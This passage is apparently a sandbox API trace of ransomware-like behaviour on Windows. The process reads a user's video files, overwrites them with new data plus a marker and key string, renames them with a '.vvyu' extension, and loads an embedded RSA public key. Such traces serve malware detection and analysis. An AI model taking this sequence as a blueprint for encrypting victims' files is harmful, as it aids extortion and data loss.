lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.685] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.685] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.685] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x137f0) returned 0x2d45778 [0190.686] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30b50 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30b08 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.687] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bd70 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39be0 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39bc8 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0190.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bd70 | out: hHeap=0x6a0000) returned 1 [0190.690] GetCurrentThreadId () returned 0x264 [0190.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44900 [0190.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.691] GetCurrentThreadId () returned 0x264 [0190.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82d20 [0190.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0190.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39be0 [0190.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c40 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c58 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bf8 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bc8 [0190.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30b08 | out: hHeap=0x6a0000) returned 1 [0190.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.702] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x137eb, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x137eb, lpOverlapped=0x0) returned 1 [0190.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.703] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x137f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.703] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0190.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0190.705] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.706] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.706] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.706] CloseHandle (hObject=0x584) returned 1 [0190.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0190.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.708] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\ZTLjJZckd4eCj5.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\ztljjzckd4ecj5.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\ZTLjJZckd4eCj5.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\ztljjzckd4ecj5.mkv.vvyu")) returned 1 [0190.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.710] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.712] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfddb21b0, ftCreationTime.dwHighDateTime=0x1d8a2fa, ftLastAccessTime.dwLowDateTime=0x99524620, ftLastAccessTime.dwHighDateTime=0x1d8a4ed, ftLastWriteTime.dwLowDateTime=0x99524620, ftLastWriteTime.dwHighDateTime=0x1d8a4ed, nFileSizeHigh=0x0, nFileSizeLow=0xc367, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dEi9BifVC5tQMw.flv", cAlternateFileName="_DEI9B~1.FLV")) returned 1 [0190.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.713] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\_dEi9BifVC5tQMw.flv") returned=".flv" [0190.713] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\_dEi9BifVC5tQMw.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\_dei9bifvc5tqmw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.714] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=50023) returned 1 [0190.714] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.717] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc341, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.717] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.719] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.719] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xc367, lpOverlapped=0x0) returned 1 [0190.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.721] lstrlenA (lpString="-----BEGIN PUBLIC 